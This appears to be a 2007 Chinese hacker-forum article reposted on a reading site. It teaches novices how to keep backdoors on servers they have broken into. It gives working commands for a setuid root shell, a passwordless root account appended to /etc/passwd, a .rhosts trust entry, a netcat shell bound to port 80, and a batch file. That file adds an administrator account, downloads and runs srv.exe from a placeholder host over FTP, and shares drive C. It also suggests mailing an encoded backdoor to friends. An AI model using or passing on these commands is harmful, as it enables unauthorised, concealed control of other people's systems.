常见留后门手法

来源： 作者： 出处：巧巧读书 2007-03-09 进入讨论组

• 关 键 词：
• hacker
• telnet
• redhat
• asp
• cgi

　　[fly]常见留后门手法[/fly]
-king
对于我们这样的菜手，好不容易搞了太服务器很不容易，如果被发现了就k了。呵呵
其实，开后门的方法有很多种，下面我来说说，我以前学习过的几种方法
1. setuid
#cp /bin/sh /tmp/.root
#chmod u+s /tmp/.root
加上 suid 位到shell 上，虽然很简单，但容易被发现

2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd
即给系统增加一个 id 为 0（root)的帐号，无口令；
但管理员用find命令就可以发现，呵呵
-
3.echo "+ hack">>/.rhosts
如果这个系统开了512,513的port呵呵，就可以
把一个名为hack加到.rhosts文件中，rlogin登陆，无须密码

4.修改 sendmail.cf文件 增加一个"wiz" 命令;
然后telnet www.xxx.com 25后，wiz。。。。ok

5. rootkit backdoor
呵呵。这些东西现在是很活热的东西，但小心该后的文件的适用性，日期等等一些小的细节。
不然。。。。。
有的需要自己编译，有的是编译好的。
7.remote shell
sunx的哪个backdoor就很不错，不回产生日记文件，防止who..呵呵。需要编译
但运行在redhat 6.1很不错。但在7.1等版本中好象就有点bug
或可以bindshell
可以替换inetd.conf中不常用的服务，注意文件的修改时间 。
8. http后门
呵呵，其实，一般的防火墙对web服务的限制少的很，所以我们可以从这里入手，这里需要用到端口重定向
简单的说就是web开的http服务有2个，一个是http本身，一个是remote shell 或是bindshell
防火墙过滤其他一切port，禁止反向连接，我靠！简单的就是可以用nc。（netcat呵呵这个）把cmd.exe绑定
到80端口上去。telnet www.xxx.com 80 然后就得到一个shell
或！可以利用asp,php.cgi等代码写的后门，也可以作到相同的效果！
9.bat后门（原创）
如果是xnix服务器。没办法。。。
ms服务器：
backdoor.bat
net user hacker windychild /add
net localgroup administrators hacker /add ...create super admin user
echo open www.xxx.com>c:\ftp.txt
echo xxx>>c:\ftp.txt
echo xxxxxx>>c:\ftp.txt
echo get srv.exe>>c:\ftp.txt
echo bye>>c:\ftp.txt
ftp -s:c:\ftp.txt
copy srv.exe c:\winnt\
c:\winnt\srv.exe
del c:\ftp.txt
del c:\srv.exe ......可以自己设置木马或后门等
....或你可以写上开启3389服务，telnet的语句
其他，开放共享服务！
net share ipc=ipc\$
net share hdc=c\$
......
如果狠点的话，干脆再给它上个rootkit for win，昏，，还要这个bat做什么。。。
10，可以利用邮件编码漏洞，自己设置一个base64的编码文件发给你的朋友
然后把后门.exe转换成邮件编码。
呵呵具体方法我好像看过，但不知道在那里了。
。。。。
其实，上面的方法都是很常见的方法，还有很多方法，一时没办法整理出来。
但对于新手来说足够了！收藏地址:http://www.qqread.com/net-saft/x300767.html进入讨论组讨论。

【收藏此文】【大 中 小】【打印】【关闭】

较早的文章：用好Windows权限之剑-严防非法入侵

较新的文章：攻防秘技:彻底防范网络炸弹